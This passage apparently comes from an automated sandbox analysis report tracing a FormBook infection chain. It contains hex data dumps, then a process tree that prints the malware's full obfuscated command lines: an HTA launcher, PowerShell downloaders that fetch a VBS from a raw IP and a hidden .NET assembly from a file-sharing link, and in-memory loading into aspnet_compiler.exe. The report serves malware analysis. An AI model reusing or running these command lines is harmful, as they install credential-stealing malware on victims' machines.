                                                                                                      2024-11-26 08:49:23 UTC8192INData Raw: 0b e3 51 c6 9a 8d 42 38 16 de 43 ad 12 6b 96 07 9e dc 1e f8 00 d7 f8 73 f8 4e 9a 38 64 21 98 f9 83 71 34 bf 80 8e 2f e7 9e 8b c3 a3 27 c1 b4 6e 56 ff 00 70 bd 17 e0 31 2f b4 8a df 77 8d 5a 35 65 fd e1 06 ee 88 8d ab f9 66 97 85 38 7f 0a d2 6d 63 e9 81 01 f8 9d a2 f0 21 90 bb 2b 91 b4 81 cd 01 79 2c 1e 41 b5 58 2d 7b e1 80 67 66 60 b4 2e ba f5 ce 45 45 2f 7c b7 b1 c0 53 51 a6 79 e1 d9 13 85 60 3a 83 84 f0 b8 1e 38 76 4c fe 64 80 f2 d8 64 91 11 58 94 01 ae 81 cb 19 50 2b 2c 67 69 23 93 80 2d 58 52 a6 9c 1f 7f 86 66 1d 1d 9d ea bc 83 7d 73 58 40 8d a5 66 0b 76 7d 47 f5 ca 26 c7 8c 00 08 6c 0c e9 a2 7d a5 89 da aa 39 38 b8 96 17 50 c9 ea 03 82 73 48 2a 89 7c a6 b3 b8 1e 09 ed 99 b3 7d da 09 8c 01 42 1b fa 1c 0b ba 24 cb b4 8d ca 45 10 30 fe 1b a3 d1 e8 61 91
                                                                                                      Data Ascii: QB8CksN8d!q4/'nVp1/wZ5ef8mc!+y,AX-{gf`.EE/|SQy`:8vLddXP+,gi#-XRf}sX@fv}G&l}98PsH*|}B$E0a
                                                                                                      2024-11-26 08:49:23 UTC8192INData Raw: f8 c6 e9 53 ca 47 8a 38 88 f2 d5 5a 81 03 fc 43 bf 4c 0b eb 75 32 eb d9 51 55 23 83 61 78 93 a0 0a bb b9 3f f2 9c cf 48 1b ef 71 e9 84 80 87 65 01 94 f6 6a af e7 97 4d 5a 94 55 65 fc 31 b2 2b 5f 62 1b b7 bd b7 5f 6c 13 4c 17 51 14 a8 a4 2a ec bb 3d 4a 81 fd b0 1a 78 11 cc 62 11 42 98 b3 17 dc 2d 46 e2 38 03 b5 7b f5 c1 88 18 05 6d c8 aa c9 bc 9b 26 81 6d b5 f3 07 2a 35 2a 8c 81 10 aa 8d c0 8d dd 77 2d 1a fe 99 63 aa 8d c1 56 4d b1 88 c2 85 dc 6c 8d e1 bf 3a bc 0b 18 1c d7 98 51 4e e6 46 b6 a0 0a 80 49 bf 91 ed d7 2a f1 d3 aa 89 e3 f2 ca d8 76 63 b4 8b 22 ea b7 75 1e df a6 5b ef ec ab 13 ef 62 e8 ce 02 86 e5 54 80 3a d7 5e bc fc 32 1f 5e 5b 50 1d bc dd bb 36 13 e6 5b 91 77 7b 88 eb 7f 0c 01 3e 95 81 62 ce 81 57 69 df c9 0d 62 c5 71 7d 31 76 52 8c 57 8b 06
                                                                                                      Data Ascii: SG8ZCLu2QU#ax?HqejMZUe1+_b_lLQ*=JxbB-F8{m&m*5*w-cVMl:QNFI*vc"u[bT:^2^[P6[w{>bWibq}1vRW
                                                                                                      2024-11-26 08:49:23 UTC8192INData Raw: 9e 0d 5f 81 f9 68 b1 a3 69 de 5a 57 dc 19 9d b7 31 ff 00 99 9b 3c 34 42 38 d5 83 1e 01 dd 9e fb f6 cf e5 2c 9f 67 e4 85 95 b4 eb a7 65 4d 86 c0 50 56 b9 f9 56 7c a9 35 91 0d 49 f5 3d 37 24 11 63 03 7a d1 c0 21 b8 39 c2 14 1c 93 44 9f c3 ef 99 cf a8 55 16 ae a7 8b a0 68 fe 58 b2 78 93 b3 17 94 32 d1 e3 9c 0d 87 82 35 51 40 00 01 ab ca c0 a9 4d 19 65 62 17 71 c5 23 d4 87 a2 5b aa 93 f8 b1 69 75 48 19 b6 37 3c 0e 2f df 01 dd 73 01 10 00 a8 07 af ca b8 c8 48 d1 b6 85 0a 48 27 a7 d3 32 e5 97 cd 51 e6 3b 32 dd b0 1d 87 ab 02 de 27 24 5b 44 55 43 d5 cf b9 e7 03 74 2a aa 95 63 6a a7 f2 c2 a3 23 46 50 6e da 07 f1 66 76 9b c4 7c ed 31 92 4b 56 e7 81 d0 e1 d3 58 8f 28 2a db 81 2d 75 80 d9 58 d0 2a d1 db d8 0e d9 49 65 81 94 24 85 95 6f 83 ee 70 32 ea d2 2d ab 4c 4b
                                                                                                      Data Ascii: _hiZW1<4B8,geMPVV|5I=7$cz!9DUhXx25Q@Mebq#[iuH7</sHH'2Q;2'$[DUCt*cj#FPnfv|1KVX(*-uX*Ie$op2-LK
                                                                                                      2024-11-26 08:49:24 UTC8192INData Raw: 1c 7d 71 31 3b 39 1e 73 6e 2c dc 9e 95 5c 8a c6 f4 f0 01 29 dd 2e d5 89 8e d5 22 86 d3 cf f3 cc ed 4a d4 ec 63 3b d4 74 a1 81 a4 67 56 45 bf 53 2f 71 8c c2 18 c2 1a 32 0a 9b cc 4d 3c c5 25 05 c1 02 fe 99 ab a6 9c a4 81 54 aa c0 a7 83 76 49 27 93 80 e0 92 26 0a 0a 96 6f 86 2c 5c 38 2d 74 09 25 49 1e d8 2d 56 dd a3 6a d0 2d f8 b7 51 eb f0 c8 4f 48 00 11 b4 0a a2 6f e3 80 cc 8e 85 06 df 51 00 1c 4e 59 59 65 1f bb 65 16 2d 8f 40 2f 0f 13 b2 4f 20 3b 5a 36 20 a8 03 f0 e5 a7 4d 3b 15 69 54 b1 07 8e 4d 7e 58 08 eb e7 75 68 a5 89 9b a1 04 0e 99 68 e6 f3 16 37 da 49 27 d4 6f a6 76 aa 54 dc ca 16 a8 75 ed 58 1d 3d 2b 02 41 da c3 70 38 0e 86 0a d5 64 8a ae 7b 62 fa bd 26 9d 50 01 e8 76 3c 5f ce b0 e8 51 99 49 1d 3a de 2d aa 85 4b aa bb 82 cd b8 86 07 e3 60 60 02 28
                                                                                                      Data Ascii: }q1;9sn,\)."Jc;tgVES/q2M<%TvI'&o,\8-t%I-Vj-QOHoQNYYee-@/O ;Z6 M;iTM~Xuhh7I'ovTuX=+Ap8d{b&Pv<_QI:-K``(
                                                                                                      2024-11-26 08:49:24 UTC8192INData Raw: a0 71 89 51 22 65 e4 15 1c f5 c1 38 dc 0b ec 50 b8 13 a6 56 67 20 9f 48 ee 3a e7 6a 54 89 14 74 52 6b 81 5f 9e 3d 12 6c d2 3c 91 a2 db 30 1c e2 3a 81 b5 55 9d 09 37 d0 1c 0e 31 05 9b 9f 50 61 f9 65 0c 3e 67 4f 4a 2f 1f 4c 2c 4e 08 0d cd 37 1f 2c 69 52 97 71 50 cb 5b 41 c0 46 1d 1c b2 4b fb b7 14 0f 01 9b a8 ce 95 19 35 64 3a 0a eb 49 d0 d7 39 a2 48 52 a1 50 29 ae a3 06 27 58 d9 81 4b 6a 37 f9 60 22 da 4a 89 99 cb 2b 75 da 3a 1b 38 02 11 fd 2b 16 d2 3b 86 c7 c8 6d 56 e4 6b dc 3a 73 f0 cc e2 a5 1b 69 5d ac 0f 52 70 19 87 4e 62 60 d6 08 3c df b6 5e 59 91 66 13 8a ae 85 7e 38 00 ee b1 96 00 a8 3d ba de 14 b2 ea 08 25 02 80 a0 0d bf cf 00 b1 29 d4 28 99 81 dc 5a c5 74 19 b5 11 66 8a eb d5 54 05 d6 62 a4 ab 0c 24 00 59 41 eb 7c fe 58 f6 9b 5d 14 90 96 16 a0 76
                                                                                                      Data Ascii: qQ"e8PVg H:jTtRk_=l<0:U71Pae>gOJ/L,N7,iRqP[AFK5d:I9HRP)'XKj7`"J+u:8+;mVk:si]RpNb`<^Yf~8=%)(ZtfTb$YA|X]v
                                                                                                      2024-11-26 08:49:24 UTC8192INData Raw: 41 47 76 ee 49 be 3f 17 b1 c1 34 a4 31 1b 43 74 26 8d fe 78 68 74 6d 36 a0 20 20 53 53 91 7e 9e b7 7c 7c 30 13 72 e8 40 25 6f 82 08 cb 45 33 2b 92 42 9d df 8a d4 5d 7c 2f 2f 24 88 ac 54 02 cb 7e 96 b2 a0 fc 6a b2 02 96 55 90 28 0a 2d 8d b7 6b 02 ff 00 3c 0e 4d 43 45 3a bc 63 84 60 ca 0a 8e df 21 94 32 b3 69 e3 88 03 6a ec dc 0f 70 a3 ff 00 a9 c3 a0 06 64 89 d4 00 c4 1b dd 40 dd 1f 6b ef 81 76 2a 47 a4 ed 37 b6 db a8 bc 0b 48 fe 74 ea cd b8 0d 8a a4 81 67 d2 a0 74 fa 65 b5 33 99 ac 91 cb 4a f2 13 5f e2 af ed 95 43 e6 b1 34 14 01 6c cc 49 00 74 ec 2f 2c d0 10 cc 19 91 6a ad bd 55 64 58 1f 90 c0 34 2c 16 25 76 65 1b 21 78 c7 a9 4f e2 0d da ef f8 bd b2 af 3a b4 6f 45 b7 49 1a c6 41 1c 0d a5 45 83 7c fe 1f 6c 08 57 59 4c 3b 6d f7 6d f9 1e 9e df 2c b8 08 b0 c6
                                                                                                      Data Ascii: AGvI?41Ct&xhtm6 SS~||0r@%oE3+B]|//$T~jU(-k<MCE:c`!2ijpd@kv*G7Htgte3J_C4lIt/,jUdX4,%ve!xO:oEIAE|lWYL;mm,


                                                                                                      Click to jump to process

                                                                                                      Click to jump to process

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Click to jump to process

                                                                                                      Target ID:0
                                                                                                      Start time:03:49:06
                                                                                                      Start date:26/11/2024
                                                                                                      Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:mshta.exe "C:\Users\user\Desktop\creamymilkburnwtithsweetheartshegivenmebestterthingswhichnewandshineforme.hta"
                                                                                                      Imagebase:0xa70000
                                                                                                      File size:13'312 bytes
                                                                                                      MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:moderate
                                                                                                      Has exited:true

                                                                                                      Target ID:1
                                                                                                      Start time:03:49:07
                                                                                                      Start date:26/11/2024
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\SYsTem32\windOwsPoWeRshELl\v1.0\PowershELl.ExE" "PoWerSheLL.eXE -EX BypasS -noP -w 1 -C DEviceCrEDENTIALDEPLoYMEnt.EXe ; ieX($(iEX('[sySteM.TEXT.EnCOdIng]'+[CHAR]58+[chAR]0X3a+'UTF8.GetsTriNg([sysTem.ConVert]'+[CHaR]0X3A+[CHAr]0x3A+'fRombasE64sTRiNG('+[ChAR]0X22+'JGVZYlFRYlRxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRFZklOaXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRLYk1uT2lGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5ZkVqSG9vTHUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGeXNTUVRxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZ04pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImduS3dXQyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvWlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZVliUVFiVHE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDYuNzAuMTU1LjI1NC8xMTUwL2NyZWF0ZWFiZXR0ZXJidXR0ZXJzbW9vdGhzbW9vdGh5a2luZ3N0b2dldG1lc3dlZWV0bmVzcy50SUYiLCIkRW52OkFQUERBVEFcY3JlYXRlYWJldHRlcmJ1dHRlcnNtb290aHNtb290aHlraW5nc3RvZ2V0bWVzdy52QnMiLDAsMCk7c3RBclQtU0xFRXAoMyk7aWV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlYWJldHRlcmJ1dHRlcnNtb290aHNtb290aHlraW5nc3RvZ2V0bWVzdy52QnMi'+[chAr]34+'))')))"
                                                                                                      Imagebase:0xef0000
                                                                                                      File size:433'152 bytes
                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:2
                                                                                                      Start time:03:49:07
                                                                                                      Start date:26/11/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff70f010000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:3
                                                                                                      Start time:03:49:07
                                                                                                      Start date:26/11/2024
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BypasS -noP -w 1 -C DEviceCrEDENTIALDEPLoYMEnt.EXe
                                                                                                      Imagebase:0xef0000
                                                                                                      File size:433'152 bytes
                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:4
                                                                                                      Start time:03:49:12
                                                                                                      Start date:26/11/2024
                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uzumsuzj\uzumsuzj.cmdline"
                                                                                                      Imagebase:0xb60000
                                                                                                      File size:2'141'552 bytes
                                                                                                      MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:moderate
                                                                                                      Has exited:true

                                                                                                      Target ID:5
                                                                                                      Start time:03:49:12
                                                                                                      Start date:26/11/2024
                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA57E.tmp" "c:\Users\user\AppData\Local\Temp\uzumsuzj\CSC9B0A3672FBDD48D4844B884E3D96D699.TMP"
                                                                                                      Imagebase:0xf50000
                                                                                                      File size:46'832 bytes
                                                                                                      MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:moderate
                                                                                                      Has exited:true

                                                                                                      Target ID:7
                                                                                                      Start time:03:49:18
                                                                                                      Start date:26/11/2024
                                                                                                      Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createabetterbuttersmoothsmoothykingstogetmesw.vBs"
                                                                                                      Imagebase:0x5d0000
                                                                                                      File size:147'456 bytes
                                                                                                      MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:8
                                                                                                      Start time:03:49:18
                                                                                                      Start date:26/11/2024
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnT0pQaW1hZ2VVcmwgPSBHZEhodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxlaycrJ2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNCcrJ3RueGxBJysnVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGMnKyc5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBHJysnZEg7T0pQd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0JysnLldlYkNsaWVudDtPSicrJ1BpbWEnKydnZUJ5dGVzID0gT0pQd2ViQ2xpZW50LkRvd25sb2FkRGF0YShPSlBpbWFnZVVybCk7T0pQaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuYycrJ29kaW4nKydnXTo6VVRGOC5HZXRTdHJpbmcoT0pQaW1hZ2VCeXRlcyk7T0pQc3RhcnRGbGFnID0gR2RIPDxCQVNFNjRfU1RBUlQ+PkdkSDtPJysnSlBlbmRGbGFnID0gR2RIPDxCQVNFNjRfRU5EPj5HZEg7T0pQc3RhcnRJbmRleCA9IE9KUGltYWdlVGV4dC5JbicrJ2RleE9mKE9KUHN0YXJ0RmxhZyk7T0pQZW5kSW5kZXggPSBPSlBpbWFnZVRleHQuSW4nKydkZXhPZihPSlBlbmRGbGFnKTtPSlBzdGFydEluZGV4IC1nZSAwIC1hbmQgT0pQZW5kSW5kZXggLWd0JysnIE9KUHN0YXJ0SW5kZXg7T0pQc3RhcnRJbmRleCArPSBPSlBzdGFydEZsYWcuTGVuZ3RoO09KUGJhc2U2NExlbmd0aCA9IE9KUGVuZEluZGV4IC0gT0pQcycrJ3RhcnRJbmRleDtPSlBiYXNlNjRDb21tYW5kID0gJysnT0pQaW1hZ2VUZXh0LlN1YnN0cmluZyhPSlBzdGFydEluZGV4LCBPSlBiYXNlNjRMZW5ndGgpJysnO09KUGJhc2U2NFJldmVyc2VkID0gLWpvJysnaW4gKE9KUGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSByZVIgRm9yRWFjaC1PYmplY3QgeyBPSlBfIH0pWy0xLi4tKE9KUGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07T0pQY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhPSlBiYXNlNjRSZXZlcnNlZCk7T0pQbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKE9KUGNvbW0nKydhbmRCeXRlcyk7T0pQdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChHZEhWJysnQUlHZEgpO09KUHZhaU1lJysndGhvZC5JbnZva2UoT0pQbnVsbCwgQChHZEh0eHQuQU1NUkMvMDUxMS80NTIuNTUnKycxLjA3LjY0MS8vOnB0dGhHJysnZEgsICcrJ0dkSGRlc2F0aScrJ3ZhZG9HZEgsIEdkSGRlc2F0aXZhZG9HZEgsIEdkSGRlc2F0aXZhZG9HZEgsIEdkSGFzcG5ldF9jb21waWxlckdkSCwgR2RIZGVzYXRpdmFkb0dkSCwgR2RIZGVzYXRpdmFkb0dkSCxHZEhkZXNhdGl2YWRvR2RILEdkSGRlc2F0aXZhZG9HZEgsR2RIZGVzYXRpJysndmFkb0dkSCwnKydHZEhkZXNhdGl2YWRvR2RILEdkSGRlc2F0aXZhZG9HZEgsR2RIMUdkSCxHZEhkZXNhdGl2YWRvR2RIKSk7JyktY1JlcGxhQ2UgIChbQ0hhUl03MStbQ0hhUl0xMDArW0NIYVJdNzIpLFtDSGFSXTM5LWNSZXBsYUNlIChbQ0hhUl0xMTQrW0NIYVJdMTAxK1tDSGFSXTgyKSxbQ0hhUl0xMjQgLWNSZXBsYUNlIChbQ0hhUl03OStbQ0hhUl03NCtbQ0hhUl04MCksW0NIYVJdMzYpfC4gKCAkc2hlbGxpRFsxXSskU0hFTGxpZFsxM10rJ3gnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                      Imagebase:0xef0000
                                                                                                      File size:433'152 bytes
                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:9
                                                                                                      Start time:03:49:18
                                                                                                      Start date:26/11/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff70f010000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      Target ID:10
                                                                                                      Start time:03:49:19
                                                                                                      Start date:26/11/2024
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('OJPimageUrl = GdHhttps://3105.filemail.com/api/file/get?filek'+'ey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4'+'tnxlA'+'VbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c'+'9bfb9571732531309b5ff7c G'+'dH;OJPwebClient = New-Object System.Net'+'.WebClient;OJ'+'Pima'+'geBytes = OJPwebClient.DownloadData(OJPimageUrl);OJPimageText = [System.Text.Enc'+'odin'+'g]::UTF8.GetString(OJPimageBytes);OJPstartFlag = GdH<<BASE64_START>>GdH;O'+'JPendFlag = GdH<<BASE64_END>>GdH;OJPstartIndex = OJPimageText.In'+'dexOf(OJPstartFlag);OJPendIndex = OJPimageText.In'+'dexOf(OJPendFlag);OJPstartIndex -ge 0 -and OJPendIndex -gt'+' OJPstartIndex;OJPstartIndex += OJPstartFlag.Length;OJPbase64Length = OJPendIndex - OJPs'+'tartIndex;OJPbase64Command = '+'OJPimageText.Substring(OJPstartIndex, OJPbase64Length)'+';OJPbase64Reversed = -jo'+'in (OJPbase64Command.ToCharArray() reR ForEach-Object { OJP_ })[-1..-(OJPbase64Command.Length)];OJPcommandBytes = [System.Convert]::FromBase64String(OJPbase64Reversed);OJPloadedAssembly = [System.Reflection.Assembly]::Load(OJPcomm'+'andBytes);OJPvaiMethod = [dnlib.IO.Home].GetMethod(GdHV'+'AIGdH);OJPvaiMe'+'thod.Invoke(OJPnull, @(GdHtxt.AMMRC/0511/452.55'+'1.07.641//:ptthG'+'dH, '+'GdHdesati'+'vadoGdH, GdHdesativadoGdH, GdHdesativadoGdH, GdHaspnet_compilerGdH, GdHdesativadoGdH, GdHdesativadoGdH,GdHdesativadoGdH,GdHdesativadoGdH,GdHdesati'+'vadoGdH,'+'GdHdesativadoGdH,GdHdesativadoGdH,GdH1GdH,GdHdesativadoGdH));')-cReplaCe ([CHaR]71+[CHaR]100+[CHaR]72),[CHaR]39-cReplaCe ([CHaR]114+[CHaR]101+[CHaR]82),[CHaR]124 -cReplaCe ([CHaR]79+[CHaR]74+[CHaR]80),[CHaR]36)|. ( $shelliD[1]+$SHELlid[13]+'x')"
                                                                                                      Imagebase:0xef0000
                                                                                                      File size:433'152 bytes
                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:12
                                                                                                      Start time:03:49:46
                                                                                                      Start date:26/11/2024
                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                                                                      Imagebase:0x220000
                                                                                                      File size:56'368 bytes
                                                                                                      MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:13
                                                                                                      Start time:03:49:46
                                                                                                      Start date:26/11/2024
                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                                                                      Imagebase:0x770000
                                                                                                      File size:56'368 bytes
                                                                                                      MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.2276568583.0000000005F80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.2276568583.0000000005F80000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.1829585665.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.1829585665.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.1849072015.0000000001F30000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.1849072015.0000000001F30000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                      Has exited:true

                                                                                                      Target ID:14
                                                                                                      Start time:03:49:49
                                                                                                      Start date:26/11/2024
                                                                                                      Path:C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exe"
                                                                                                      Imagebase:0xfc0000
                                                                                                      File size:140'800 bytes
                                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.2577427025.0000000003190000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.2577427025.0000000003190000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                      Has exited:false

                                                                                                      Target ID:15
                                                                                                      Start time:03:49:51
                                                                                                      Start date:26/11/2024
                                                                                                      Path:C:\Windows\SysWOW64\cleanmgr.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\SysWOW64\cleanmgr.exe"
                                                                                                      Imagebase:0x610000
                                                                                                      File size:273'920 bytes
                                                                                                      MD5 hash:527CCDB339E5A54F4B37B6FAD08A44B5
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
